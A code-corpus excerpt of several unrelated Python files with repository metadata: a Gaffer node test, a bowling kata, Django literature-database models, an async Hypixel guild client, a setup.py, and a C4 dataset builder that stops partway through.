Gaffer.ComputeNode.__init__( self, name )
self.addChild( Gaffer.ObjectPlug( "oIn", Gaffer.Plug.Direction.In, IECore.NullObject() ) )
self.addChild( Gaffer.IntPlug( "iIn", Gaffer.Plug.Direction.In ) )
IECore.registerRunTimeTyped( In )
nOut = Out()
nIn = In()
nIn["oIn"].setInput( nOut["oOut"] )
nIn["iIn"].setInput( nOut["fOut"] )
for i in range( 0, 1000 ) :
c = Gaffer.Context()
c.setFrame( i )
with c :
# because oIn and oOut are connected, they should
# have the same hash and share the exact same value.
self.assertEqual( nIn["oIn"].getValue(), IECore.IntData( i ) )
self.assertEqual( nOut["oOut"].getValue(), IECore.IntData( i ) )
self.assertEqual( nIn["oIn"].hash(), nOut["oOut"].hash() )
self.failUnless( nIn["oIn"].getValue( _copy=False ).isSame( nOut["oOut"].getValue( _copy=False ) ) )
# even though iIn and fOut are connected, they should have
# different hashes and different values, because type conversion
# (float to int) is performed when connecting them.
self.assertEqual( nIn["iIn"].getValue(), i )
self.assertEqual( nOut["fOut"].getValue(), float( i ) )
self.assertNotEqual( nIn["iIn"].hash(), nOut["fOut"].hash() )
class PassThrough( Gaffer.ComputeNode ) :
def __init__( self, name="PassThrough", inputs={}, dynamicPlugs=() ) :
Gaffer.ComputeNode.__init__( self, name )
self.addChild( Gaffer.ObjectPlug( "in", Gaffer.Plug.Direction.In, IECore.NullObject() ) )
self.addChild( Gaffer.ObjectPlug( "out", Gaffer.Plug.Direction.Out, IECore.NullObject() ) )
def affects( self, input ) :
if input.isSame( self["in"] ) :
return [ self["out"] ]
return []
def hash( self, output, context, h ) :
assert( output.isSame( self["out"] ) )
# by assigning directly to the hash rather than appending,
# we signify that we'll pass through the value unchanged.
h.copyFrom( self["in"].hash() )
def compute( self, plug, context ) :
assert( plug.isSame( self["out"] ) )
plug.setValue( self["in"].getValue( _copy=False ), _copy=False )
IECore.registerRunTimeTyped( PassThrough )
def testPassThroughSharesHashes( self ) :
n = self.PassThrough()
n["in"].setValue( IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ) )
self.assertEqual( n["in"].hash(), n["out"].hash() )
self.assertEqual( n["in"].getValue(), n["out"].getValue() )
def testPassThroughSharesCacheEntries( self ) :
n = self.PassThrough()
n["in"].setValue( IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ) )
# this fails because TypedObjectPlug::setValue() currently does a copy. i think we can
# optimise things by allowing a copy-free setValue() function for use during computations.
self.failUnless( n["in"].getValue( _copy=False ).isSame( n["out"].getValue( _copy=False ) ) )
def testInternalConnections( self ) :
a = GafferTest.AddNode()
a["op1"].setValue( 10 )
n = Gaffer.Node()
n["in"] = Gaffer.IntPlug()
n["out"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
n["out"].setInput( n["in"] )
n["in"].setInput( a["sum"] )
self.assertEqual( n["out"].getValue(), a["sum"].getValue() )
self.assertEqual( n["out"].hash(), a["sum"].hash() )
if __name__ == "__main__":
unittest.main()
| 30.989276 | 107 | 0.652479 |
f687a40b299c1ba79ff792e3f3dfcad30aaba5cf | 1,418 | py | Python | software_testing/exercises/exercise5/kata_bowling.py | rafaelleinio/software-testing | 0cb9e95b65675121360a0e47ad127666c6c5ae7d | [
"MIT"
] | 1 | 2021-02-28T02:12:35.000Z | 2021-02-28T02:12:35.000Z | software_testing/exercises/exercise5/kata_bowling.py | rafaelleinio/software-testing | 0cb9e95b65675121360a0e47ad127666c6c5ae7d | [
"MIT"
] | null | null | null | software_testing/exercises/exercise5/kata_bowling.py | rafaelleinio/software-testing | 0cb9e95b65675121360a0e47ad127666c6c5ae7d | [
"MIT"
] | null | null | null | from __future__ import annotations
from typing import List
class KataBowling:
def __init__(self, rolls: List[int] = None):
self.rolls = rolls if rolls else []
def roll(self, round_score: int):
return KataBowling(rolls=self.rolls + [round_score])
@property
def score(self) -> int:
score = 0
frame_index = 0
for frame in range(10):
if self._is_strike(frame_index):
score += 10 + self._strike_bonus(frame_index)
frame_index += 1
elif self._is_spare(frame_index):
score += 10 + self._spare_bonus(frame_index)
frame_index += 2
else:
score += self._normal_frame(frame_index)
frame_index += 2
return score
def _get_roll_score(self, i):
return self.rolls[i] if i < len(self.rolls) else 0
def _is_strike(self, i: int) -> bool:
return self._get_roll_score(i) == 10
def _is_spare(self, i: int) -> bool:
return self._get_roll_score(i) + self._get_roll_score(i + 1) == 10
def _strike_bonus(self, i: int) -> int:
return self._get_roll_score(i + 1) + self._get_roll_score(i + 2)
def _spare_bonus(self, i: int) -> int:
return self._get_roll_score(i + 2)
def _normal_frame(self, i: int) -> int:
return self._get_roll_score(i) + self._get_roll_score(i + 1)
| 30.826087 | 74 | 0.594499 |
b814468ae521cb1f61fc8db1f361d2a3eabbcc73 | 16,680 | py | Python | items/models.py | kgdunn/Django-app-Literature-database | d21358c9da6d470885a576a8944e4aa35a01ba7e | [
"BSD-2-Clause"
] | null | null | null | items/models.py | kgdunn/Django-app-Literature-database | d21358c9da6d470885a576a8944e4aa35a01ba7e | [
"BSD-2-Clause"
] | null | null | null | items/models.py | kgdunn/Django-app-Literature-database | d21358c9da6d470885a576a8944e4aa35a01ba7e | [
"BSD-2-Clause"
] | null | null | null | from django.db import models
from django.contrib import admin
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from utils import unique_slugify
# Standard library imports
import re
import unicodedata
# Custom manager for the items
class LatestItemManager(models.Manager):
def get_queryset(self):
return super().get_queryset().order_by('-date_created')
def get_latest(self, n=5):
return self.get_queryset()[0:n]
class Author(models.Model):
first_name = models.CharField(max_length=255)
middle_initials = models.CharField(max_length=31, blank=True, null=True)
last_name = models.CharField(max_length=255)
slug = models.SlugField(max_length=510, editable=False)
class Meta:
ordering = ['last_name']
def __str__(self):
if self.middle_initials:
return '%s, %s %s' % (self.last_name, self.first_name,
self.middle_initials)
else:
return '%s, %s' % (self.last_name, self.first_name)
@property
def full_name(self):
if self.middle_initials:
return u'%s %s %s' % (self.first_name, self.middle_initials,
self.last_name)
else:
return u'%s %s' % (self.first_name, self.last_name)
@property
def full_name_hyperlinked(self):
if self.middle_initials:
return u'%s %s %s' % (self.first_name, self.middle_initials,
self.last_name)
else:
return u'%s %s' % (self.first_name, self.last_name)
def get_absolute_url(self):
""" Create a URL to display all publications by this author
"""
return reverse('lit-show-items', kwargs={'what_view': 'author',
'extra_info': self.slug})
def save(self, *args, **kwargs):
"""
http://docs.djangoproject.com/en/dev/topics/db/models/
overriding-predefined-model-methods
"""
self.first_name = self.first_name.strip()
self.last_name = self.last_name.strip()
unique_slugify(self, self.full_name, 'slug')
super(Author, self).save(*args, **kwargs)
class AuthorGroup(models.Model):
""" Ensures the author order is correctly added """
author = models.ForeignKey(Author)
item = models.ForeignKey('Item')
order = models.IntegerField(default=0)
class School(models.Model):
name = models.CharField(max_length=255)
slug = models.SlugField(max_length=255, editable=False)
def __str__(self):
return self.name
def save(self, *args, **kwargs):
"""
http://docs.djangoproject.com/en/dev/topics/db/models/
overriding-predefined-model-methods
"""
self.name = self.name.strip()
self.slug = slugify(self.name)
super(School, self).save(*args, **kwargs)
class Journal(models.Model):
name = models.CharField(max_length=510)
website = models.URLField()
slug = models.SlugField(max_length=510, editable=False)
def __str__(self):
return self.name
def get_absolute_url(self):
"""
Create a URL to display all publications from this journal
"""
return reverse('lit-show-items', kwargs={'what_view': 'journal',
'extra_info': self.slug})
@property
def as_url(self):
return '<a href="%s">%s</a>' % (self.get_absolute_url(), self.name)
def save(self, *args, **kwargs):
"""
http://docs.djangoproject.com/en/dev/topics/db/models/
overriding-predefined-model-methods
"""
self.name = self.name.strip()
self.slug = slugify(str(self))
super(Journal, self).save(*args, **kwargs)
class Publisher(models.Model):
name = models.CharField(max_length=510)
slug = models.SlugField(max_length=510, editable=False)
def __str__(self):
return self.name
def save(self, *args, **kwargs):
"""
http://docs.djangoproject.com/en/dev/topics/db/models/
overriding-predefined-model-methods
"""
self.name = self.name.strip()
self.slug = slugify(str(self))
super(Publisher, self).save(*args, **kwargs)
class Item(models.Model):
objects = models.Manager() # The default manager: 'Item.objects.all()'
latest_items = LatestItemManager() #'Item.latest_items.all()'
ITEM_CHOICES = (
('thesis', 'Thesis'),
('journalpub', 'Journal publication'),
('book', 'Book'),
('conferenceproc', 'Conference proceeding'),
)
def upload_dest(instance, filename):
""" ``instance.slug`` has already been defined at this point (from
self.save()), so it can be safely used.
"""
return 'literature/pdf/%s/%s.pdf' % (instance.slug[0], instance.slug)
authors = models.ManyToManyField(Author, through='AuthorGroup')
title = models.TextField()
slug = models.SlugField(max_length=255, editable=False)
item_type = models.CharField(max_length=20, choices=ITEM_CHOICES)
year = models.PositiveIntegerField()
doi_link = models.URLField(blank=True, null=True,
verbose_name='DOI link')
web_link = models.URLField(blank=True, null=True, )
tags = models.ManyToManyField('tagging.Tag')
abstract = models.TextField(blank=True)
show_abstract = models.BooleanField(default=False)
date_created = models.DateTimeField(editable=False, auto_now=True)
pdf_file = models.FileField(upload_to=upload_dest, max_length=255,
blank=True, null=True, verbose_name='PDF file')
# This PDF should never be shown because it contains personal notes or is
# not authorized for distributions
private_pdf = models.BooleanField(default=False,
verbose_name='Private PDF')
# If ``private_pdf`` is False and this field is True, and there actually
# exists a PDF, then show the PDF available for download. Usually set
# True for theses.
# If ``private_pdf`` is True, then this still will not show the download
can_show_pdf = models.BooleanField(default=False,
verbose_name='Can show PDF')
# Contains unstructured text (auto-extracted from PDF, cut/paste, whatever)
# to improve the user's search
other_search_text = models.TextField(null=True, blank=True)
def __str__(self):
if self.doi_link:
return '%s (%s) [doi:%s]' % (self.title, str(self.year),
self.doi_link)
else:
return '%s (%s)' % (self.title, str(self.year))
@property
def has_extra(self):
return bool(self.other_search_text)
@property
def year_as_url(self):
return '<a href="%s">%s</a>' % (reverse('lit-show-items',
kwargs={'what_view': 'pub-by-year',
'extra_info': self.year}),
self.year)
@property
def external_link_text(self):
""" Text to display for the external link """
if self.doi_link:
return 'DOI'
elif self.web_link:
return 'More info'
else:
return ''
@property
def external_link(self):
""" Hyperlink to use for the external link """
if self.doi_link:
return self.doi_link
elif self.web_link:
return self.web_link
else:
return None
@property
def author_list(self):
"""
1: Duncan
2: Smith and Weston
3: Joyce et al.
"""
auth_list = self.authors.all().order_by('authorgroup__order')
if len(auth_list) > 2:
return auth_list[0].last_name + ' <i>et al</i>.'
elif len(auth_list) == 2:
return ' and '.join([auth.last_name for auth in auth_list])
else:
return auth_list[0].last_name
#author_list.allow_tags = True
@property
def author_slugs(self):
"""
Used to create the PDF file name. Doesn't matter if there are spaces
in the last name (i.e. it is not a strict slug), but it does ensure
the last names only contain normalized unicode characters.
1: Duncan
2: Smith-and-Weston
3: Joyce-Smith-Smythe
"""
auth_list = self.authors.all().order_by('authorgroup__order')
authors = []
for auth in auth_list:
author = unicodedata.normalize('NFKD', auth.last_name).encode(\
'ascii', 'ignore')
author = unicode(re.sub('[^\w\s-]', '', author).strip())
authors.append(author)
if len(auth_list) >= 3:
out = ', '.join([auth for auth in authors[0:-1]])
out += ' and ' + authors[-1]
return out
elif len(auth_list) == 2:
return ' and '.join(authors)
else:
return authors[0]
@property
def author_list_all_lastnames(self):
"""
Provides the hyperlinked author last names in full
1: Duncan
2: Smith and Weston
3: Joyce, Smith and Smythe
"""
auth_list = list(self.authors.all().order_by('authorgroup__order'))
def urlize(author):
return '<a href="%s">%s</a>' % (author.get_absolute_url(),
author.last_name)
out = ''
if len(auth_list) >= 3:
out = ', '.join([urlize(auth) for auth in auth_list[0:-1]])
out += ' and ' + urlize(auth_list[-1])
if len(auth_list) == 2:
out = ' and '.join([urlize(auth) for auth in auth_list])
if len(auth_list) == 1:
out = urlize(auth_list[0])
return out
@property
def full_author_listing(self):
"""
Provides the hyperlinked author names in full
1: Duncan
2: John R. Smith and P. Q. Weston
3: R. W. Joyce, P. J. Smith and T. Y. Smythe
"""
auth_list = list(self.authors.all().order_by('authorgroup__order'))
def urlize(author):
return '<a href="%s">%s</a>' % (author.get_absolute_url(),
author.full_name)
out = ''
if len(auth_list) >= 3:
out = ', '.join([urlize(auth) for auth in auth_list[0:-1]])
out += ' and ' + urlize(auth_list[-1])
if len(auth_list) == 2:
out = ' and '.join([urlize(auth) for auth in auth_list])
if len(auth_list) == 1:
out = urlize(auth_list[0])
return out
@property
def doi_link_cleaned(self):
return self.doi_link.lstrip('http://dx.doi.org/')
@property
def previous_item(self):
n = 1
item = Item.objects.all().filter(pk=self.pk-n)
if len(item):
return item[0].get_absolute_url()
else:
return None
@property
def next_item(self):
n = 1
item = Item.objects.all().filter(pk=self.pk+n)
if len(item):
return item[0].get_absolute_url()
else:
return None
def get_absolute_url(self):
""" I can't seem to find a way to use the "reverse" or "permalink"
functions to create this URL: do it manually, to match ``urls.py``
"""
return reverse('lit-view-item', args=[0]).rstrip('0') + \
'%d/%s' % (self.pk, self.slug)
def save(self, *args, **kwargs):
self.title = self.title.strip()
unique_slugify(self, self.title[0:255], 'slug')
super(Item, self).save(*args, **kwargs)
class JournalPub(Item):
journal = models.ForeignKey(Journal)
volume = models.CharField(max_length=100, blank=True, null=True)
page_start = models.CharField(max_length=10, blank=True, null=True)
page_end = models.CharField(max_length=10, blank=True, null=True)
def __str__(self):
return '%s (%s) [doi:%s]' % (self.title, str(self.year),
self.doi_link)
def full_citation(self):
"""
Returns details about the journal publication in HTML form
"""
return u'%s: "%s", <i>%s</i>, <b>%s</b>, %s-%s, %s.' %\
(self.author_list,
self.title,
self.journal.as_url,
self.volume,
self.page_start,
self.page_end,
self.year_as_url)
class Meta:
verbose_name_plural = "journal publications"
class Book(Item):
publisher = models.ForeignKey(Publisher)
editors = models.ManyToManyField(Author, blank=True)
volume = models.CharField(max_length=100, blank=True, null=True)
series = models.CharField(max_length=100, blank=True, null=True)
edition = models.CharField(max_length=100, blank=True, null=True)
isbn = models.CharField(max_length=20, blank=True, null=True,
verbose_name='ISBN')
def full_citation(self):
"""
Returns details about the book in HTML form
"""
edition = self.edition.lower().rstrip('edition')
if self.edition:
return '%s: "<i>%s</i>", %s, %s, %s.' % (self.full_author_listing,
self.title,
edition,
self.publisher,
self.year_as_url)
return '%s: "<i>%s</i>", %s, %s.' % (self.author_list,
self.title,
self.publisher,
self.year_as_url)
class ConferenceProceeding(Item):
editors = models.ManyToManyField(Author, blank=True)
conference_name = models.CharField(max_length=255, blank=True, null=True)
page_start = models.CharField(max_length=10, blank=True, null=True)
page_end = models.CharField(max_length=10, blank=True, null=True)
organization = models.CharField(blank=True, null=True, max_length=200)
location = models.CharField(blank=True, null=True, max_length=200)
publisher = models.ForeignKey(Publisher, blank=True, null=True)
def full_citation(self):
"""
Returns details about the conference in HTML form
"""
first = '%s: "<i>%s</i>", '% (self.author_list, self.title)
rest = (item for item in [self.conference_name, self.organization,
self.location, self.publisher] if item)
rest = ', '.join(rest)
final = ', %s.' % self.year
if self.page_start and self.page_end:
final = ', %s-%s, %s.' % (self.page_start, self.page_end,
self.year)
elif self.page_start:
final = ', %s, %s.' % (self.page_start, self.year)
return first + rest + final
class Meta:
verbose_name_plural = "conference proceedings"
class Thesis(Item):
THESIS_CHOICES = (
('masters', 'Masters thesis'),
('phd', 'Ph.D thesis'),
)
thesis_type = models.CharField(max_length=50, choices=THESIS_CHOICES)
school = models.ForeignKey(School)
supervisors = models.ManyToManyField(Author, blank=True)
def full_citation(self):
"""
Returns details about the thesis in HTML form
"""
thesis_type = ''
for option_key, option_value in self.THESIS_CHOICES:
if self.thesis_type == option_key:
thesis_type = option_value
return '%s: "<i>%s</i>", %s, %s, %s.' % (self.author_list,
self.title,
thesis_type,
self.school,
self.year_as_url)
class Meta:
verbose_name_plural = "theses"
| 34.391753 | 83 | 0.547062 |
8d58aee32f2fbb8d3fd4aa72064c7c346bdea0a0 | 2,590 | py | Python | hypixel/guild.py | SomePr0grammer/aHypixel | 35a2db37fe780bfd31bc116796ea850c98d219d6 | [
"MIT"
] | null | null | null | hypixel/guild.py | SomePr0grammer/aHypixel | 35a2db37fe780bfd31bc116796ea850c98d219d6 | [
"MIT"
] | null | null | null | hypixel/guild.py | SomePr0grammer/aHypixel | 35a2db37fe780bfd31bc116796ea850c98d219d6 | [
"MIT"
] | null | null | null | from .errors import *
from .player import Player
import aiohttp
class Guild:
"""
Guild class. Represents a Hypixel guild.
Methods:
ʟ get_guild: Get a guild by parameters
parameters
ʟ *: Indicates the following parameters are positional (e.g: method(parameter=option))
ʟ username: str (optional)
ʟ name: str (optional)
ʟ guild_id: str (optional)
although 1 parameter is required
Parameters:
key: str
Attributes:
key: str
get_uuid: see Player.get_uuid()
"""
def __init__(self, key: str, session: aiohttp.ClientSession):
self.key = key
self.session = session
self.get_uuid = Player.get_uuid
async def get_guild(self, *, username: str = False, name: str = False, guild_id: str = False):
if not username:
if not name:
if not guild_id:
raise TypeError('No arguments recieved.')
else:
async with self.session.get(
url='https://api.hypixel.net/guild',
params={
'key': self.key,
'id': guild_id
}
) as data:
guild = await data.json()
if data.status == 200:
return guild
else:
raise APIError(f'Cause: {guild.cause}')
else:
async with self.session.get(
url='https://api.hypixel.net/guild',
params={
'key': self.key,
'name': guild_id
}
) as data:
guild = await data.json()
if data.status == 200:
return guild
else:
raise APIError(f'Cause: {guild.cause}')
else:
async with self.session.get(
url='https://api.hypixel.net/guild',
params={
'key': self.key,
'uuid': self.get_uuid(username)
}
) as data:
guild = await data.json()
if data.status == 200:
return guild
else:
raise APIError(f'Cause: {guild.cause}')
| 34.533333 | 103 | 0.420077 |
3ab688fd7fedd95e77b913c57780870bd1cf76c8 | 540 | py | Python | src/python/models/setup.py | openhisilicon/taranis | 4b852a64a9aba0a6db3e87ed6dc720b0889fb3e4 | [
"BSD-3-Clause"
] | 5 | 2020-07-20T09:24:27.000Z | 2021-11-16T11:07:51.000Z | src/python/models/setup.py | openhisilicon/taranis | 4b852a64a9aba0a6db3e87ed6dc720b0889fb3e4 | [
"BSD-3-Clause"
] | 1 | 2021-06-02T00:44:47.000Z | 2021-06-02T00:44:47.000Z | src/python/models/setup.py | openhisilicon/taranis | 4b852a64a9aba0a6db3e87ed6dc720b0889fb3e4 | [
"BSD-3-Clause"
] | 1 | 2021-06-17T06:24:13.000Z | 2021-06-17T06:24:13.000Z | # coding: utf-8
"""
Taranis Client
"""
from setuptools import setup # noqa: H301
NAME = "taranis-cli"
VERSION = "0.2.3"
REQUIRES = ["grpcio==1.21.1", "grpcio-tools==1.21.1"]
setup(
name=NAME,
version=VERSION,
description="Taranis client",
author="Pierre Letessier",
author_email="",
url="https://github.com/pletessier/taranis",
keywords=["lib", "taranis", "client"],
install_requires=REQUIRES,
packages=["."],
include_package_data=True,
long_description="""\
Taranis client
"""
)
| 19.285714 | 53 | 0.62963 |
c9a6c5a7db6f0cdb245f980eba3536c0cb8bbff7 | 13,622 | py | Python | venv/lib/python3.6/site-packages/nlp/datasets/c4/8f34fcecc5ffb5e83c649d6dff3a6079f6312e65b5a26587c9c3e27b3b741c87/c4.py | MachineLearningBCAM/minimax-risk-classifier | 82586c632268c103de269bcbffa5f7849b174a29 | [
"MIT"
] | 2 | 2021-09-28T01:36:21.000Z | 2021-12-22T08:24:17.000Z | venv/lib/python3.6/site-packages/nlp/datasets/c4/8f34fcecc5ffb5e83c649d6dff3a6079f6312e65b5a26587c9c3e27b3b741c87/c4.py | MachineLearningBCAM/minimax-risk-classifier | 82586c632268c103de269bcbffa5f7849b174a29 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/nlp/datasets/c4/8f34fcecc5ffb5e83c649d6dff3a6079f6312e65b5a26587c9c3e27b3b741c87/c4.py | MachineLearningBCAM/minimax-risk-classifier | 82586c632268c103de269bcbffa5f7849b174a29 | [
"MIT"
] | 1 | 2020-12-08T10:36:30.000Z | 2020-12-08T10:36:30.000Z | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace NLP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""C4 dataset based on Common Crawl."""
from __future__ import absolute_import, division, print_function
import json
import logging
import os
import apache_beam as beam
import nlp
from .c4_utils import (
dedupe_urls,
filter_by_webtextlike,
get_clean_page_fn,
get_counter_inc_fn,
get_hashed_url_filter_fn,
is_language,
is_realnews_domain,
is_valid_length,
normalize_url,
remove_duplicate_text,
split_wet_file,
)
_DESCRIPTION = """\
A colossal, cleaned version of Common Crawl's web crawl corpus.
Based on Common Crawl dataset: "https://commoncrawl.org"
Due to the overhead of cleaning the dataset, it is recommend you prepare it with
a distributed service like Cloud Dataflow. More info at
https://www.tensorflow.org/datasets/beam_datasets.
"""
_CITATION = """
@article{2019t5,
author = {Colin Raffel and Noam Shazeer and Adam Roberts and Katherine Lee and Sharan Narang and Michael Matena and Yanqi Zhou and Wei Li and Peter J. Liu},
title = {Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer},
journal = {arXiv e-prints},
year = {2019},
archivePrefix = {arXiv},
eprint = {1910.10683},
}
"""
_VERSION = nlp.Version("2.3.0", "Deduplicate lines within a page.")
_SUPPORTED_VERSIONS = [
nlp.Version("2.2.1", "Update dataset_info.json"),
nlp.Version("2.2.0"),
]
_DOWNLOAD_HOST = "https://commoncrawl.s3.amazonaws.com"
_WET_PATH_URL = "https://commoncrawl.s3.amazonaws.com/crawl-data/CC-MAIN-{cc_version}/wet.paths.gz"
_REALNEWS_DOMAINS_URL = "https://raw.githubusercontent.com/rowanz/grover/38f7184bd87237ae2d3bc330b99f1e2e246f6d51/realnews/domain_to_allowed_subdomains.json"
_BADWORDS_URL = "https://raw.githubusercontent.com/LDNOOBW/List-of-Dirty-Naughty-Obscene-and-Otherwise-Bad-Words/25e679f03d96baa721cde20db9944649e8d0a844/{lang}"
_CHECKSUMS_URL = "https://storage.googleapis.com/tfds-data/manual_checksums/c4.txt"
_OPENWEBTEXT_URLS_ZIP = "OpenWebText.zip"
_OPENWEBTEXT_URLS_URL = "https://mega.nz/#F!EZZD0YwJ!9_PlEQzdMVLaNdKv_ICNVQ"
_OPENWEBTEXT_URLS_FILE_PATTERN = "OpenWebText/Version 1/URLs/*.txt"
_DEFAULT_CC_VERSIONS = ("2019-18",) # April 2019
_DEFAULT_WEBTEXTLIKE_CC_VERSIONS = ( # August 2018 - July 2019
"2018-34",
"2018-39",
"2018-43",
"2018-47",
"2018-51",
"2019-04",
"2019-09",
"2019-13",
"2019-18",
"2019-22",
"2019-26",
"2019-30",
)
class C4Config(nlp.BuilderConfig):
"""BuilderConfig for C4 dataset."""
def __init__(self, language, cc_versions=None, clean=True, realnewslike=False, webtextlike=False, **kwargs):
"""BuilderConfig for C4.
Args:
language: string, the language code, or "all" to disable language
filtering.
cc_versions: tuple(string), a collection of versions of Common Crawl to
use as the raw source text. Set to None to use defaults.
clean: bool, whether to clean the dataset for badwords, duplications, etc.
realnewslike: bool, whether to limit to news domains as compiled by
RealNews.
webtextlike: bool, whether to limit to WebText-like URLs.
**kwargs: keyword arguments forwarded to super.
"""
name_parts = [language]
if cc_versions:
name_parts.append("_".join(cc_versions))
if not clean:
name_parts.append("noclean")
if realnewslike:
name_parts.append("realnewslike")
if webtextlike:
name_parts.append("webtextlike")
name = ".".join(name_parts)
super(C4Config, self).__init__(name=name, version=_VERSION, supported_versions=_SUPPORTED_VERSIONS, **kwargs)
self.lang = language
self.cc_versions = cc_versions or (_DEFAULT_WEBTEXTLIKE_CC_VERSIONS if webtextlike else _DEFAULT_CC_VERSIONS)
self.clean = clean
self.realnewslike = realnewslike
self.webtextlike = webtextlike
class C4(nlp.BeamBasedBuilder):
"""C4 dataset based on Common Crawl."""
MANUAL_DOWNLOAD_INSTRUCTIONS = """\
For the WebText-like config, you must manually download 'OpenWebText.zip'
(from https://mega.nz/#F!EZZD0YwJ!9_PlEQzdMVLaNdKv_ICNVQ) and the Common Crawl
WET files from August 2018 to July 2019
(https://commoncrawl.org/the-data/get-started/) and place them in the
`manual_dir`.
"""
BUILDER_CONFIGS = [
C4Config(language="en", description="English C4 dataset."),
C4Config(
language="en",
clean=False,
description="Disables all cleaning (deduplication, removal based on bad words, " "etc.)",
),
C4Config(
language="en",
realnewslike=True,
description="Filters from the default config to only include content from the "
"domains used in the 'RealNews' dataset (Zellers et al., 2019).",
),
C4Config(
language="en",
webtextlike=True,
description="Filters from the default config to only include content from the "
"URLs in OpenWebText (https://github.com/jcpeterson/openwebtext).",
),
]
def _info(self):
features = {
"text": nlp.Value("string"),
"url": nlp.Value("string"),
}
if self.version > "1.0.0":
features.update(
{
"content-type": nlp.Value("string"),
"content-length": nlp.Value("string"),
"timestamp": nlp.Value("string"),
}
)
return nlp.DatasetInfo(
description=_DESCRIPTION,
features=nlp.Features(features),
citation=_CITATION,
homepage="https://github.com/google-research/text-to-text-transfer-transformer#datasets",
)
def _split_generators(self, dl_manager, pipeline):
dl_manager.download_checksums(_CHECKSUMS_URL)
# We will automatically down the default CC version(s), but others need to
# be manually downloaded.
cc_versions = set(self.config.cc_versions)
auto_cc_versions = cc_versions & set(_DEFAULT_CC_VERSIONS)
manual_cc_versions = cc_versions - set(_DEFAULT_CC_VERSIONS)
files_to_download = {}
files_to_download["wet_path_urls"] = [
_WET_PATH_URL.format(cc_version=cc_version) for cc_version in auto_cc_versions
]
if self.config.clean:
files_to_download["badwords"] = _BADWORDS_URL.format(lang=self.config.lang)
if self.config.realnewslike:
files_to_download["realnews_domains"] = _REALNEWS_DOMAINS_URL
file_paths = dl_manager.download_and_extract(files_to_download)
if self.config.webtextlike:
owt_path = os.path.join(dl_manager.manual_dir, _OPENWEBTEXT_URLS_ZIP)
if not os.path.exists(owt_path):
raise FileNotFoundError(
"{} does not exist. Make sure you insert a manual dir via `nlp.load('c4', data_dir=...)` that includes a file name {}. Manual download instructions: {})".format(
owt_path, _OPENWEBTEXT_URLS_ZIP, self.MANUAL_DOWNLOAD_INSTRUCTIONS
)
)
file_paths["openwebtext_urls_zip"] = dl_manager.extract(owt_path)
wet_urls = []
for wet_path_url in file_paths["wet_path_urls"]:
with open(wet_path_url, "r") as f:
wet_urls.extend(["%s/%s" % (_DOWNLOAD_HOST, l.strip()) for l in f])
file_paths["wet_urls"] = wet_urls
file_paths["wet_files"] = []
for cc_version in manual_cc_versions:
cc_dir = os.path.join(dl_manager.manual_dir, cc_version)
wet_files = beam.io.filesystems.FileSystems.match(os.path.join(cc_dir, "*.warc.wet.gz"))
if not os.path.exists(cc_dir):
raise FileNotFoundError(
"{} does not exist. Make sure you insert a manual dir via `nlp.load('c4', data_dir=...)` that includes the files {}. Manual download instructions: {})".format(
cc_dir, "*.warc.wet.gz", self.MANUAL_DOWNLOAD_INSTRUCTIONS
)
)
logging.info("Adding %d WET files for manually downloaded version %s.", len(wet_files), cc_version)
file_paths["wet_files"].extend(wet_files)
page_content_pcollection = self._get_page_content(pipeline, file_paths, dl_manager)
return [
nlp.SplitGenerator(
name=nlp.Split.TRAIN,
gen_kwargs=dict(
split="train",
page_content=page_content_pcollection,
hashed_url_predicate=lambda x: x % 1000 != 0, # 99.9%
),
),
nlp.SplitGenerator(
name=nlp.Split.VALIDATION,
gen_kwargs=dict(
split="validation",
page_content=page_content_pcollection,
hashed_url_predicate=lambda x: x % 1000 == 0, # 0.01%
),
),
]
def _get_page_content(self, pipeline, file_paths, dl_manager):
"""Build PCollection of un-split page content."""
wet_file_paths = pipeline | "create_wet_files" >> beam.Create(file_paths["wet_files"])
if "wet_urls" in file_paths:
def download_url(url, downloader, pipeline):
path = downloader.download(url)
if not pipeline.is_local():
path = downloader.ship_files_with_pipeline(path, pipeline)
return path
dl_wet_file_paths = (
pipeline
| "create_wet_urls" >> beam.Create(file_paths["wet_urls"])
| beam.Map(download_url, downloader=dl_manager, pipeline=pipeline)
)
wet_file_paths = (wet_file_paths, dl_wet_file_paths) | beam.Flatten()
# Parse WET files and filter by length.
# Output: url, text
page_content = wet_file_paths | beam.FlatMap(split_wet_file) | beam.Filter(is_valid_length)
# Optionally filter for RealNews domains.
# Output: url, text
if self.config.realnewslike:
with open(file_paths["realnews_domains"], "r") as f:
realnews_domains = json.load(f)
page_content = page_content | beam.Filter(is_realnews_domain, realnews_domains)
# Normalize and deduplicate by URL.
# Output: url, text
page_content = (
page_content
| "normalize_url" >> beam.Map(normalize_url)
| "group_url" >> beam.GroupByKey()
| beam.Map(dedupe_urls)
)
# Optionally filter for WebText-like URLs.
# Output: url, text
if self.config.webtextlike:
webtextlike_urls = (
pipeline
| "read_webtextlike_urls"
>> beam.io.ReadFromText(
os.path.join(file_paths["openwebtext_urls_zip"], _OPENWEBTEXT_URLS_FILE_PATTERN)
)
| "add_dummy_page" >> beam.Map(lambda x: (x, ""))
| "normal_webtext_url" >> beam.Map(normalize_url)
)
page_content = (
{"text": page_content, "webtextlike_urls": webtextlike_urls}
| "group_webtextlike_urls" >> beam.CoGroupByKey()
| beam.FlatMap(filter_by_webtextlike)
)
# Optionally clean pages of badwords, boilerpolate text, and duplicate
# spans of sentences.
# Output: url, text
if self.config.clean:
with open(file_paths["badwords"], "r") as f:
badwords = [l.strip() for l in f]
page_content = page_content | "clean_pages" >> beam.FlatMap(get_clean_page_fn(badwords))
page_content = remove_duplicate_text(page_content)
# Optionally filter out non-`language` pages. We do this after cleaning
# since it may change the predominate language.
if self.config.lang != "all":
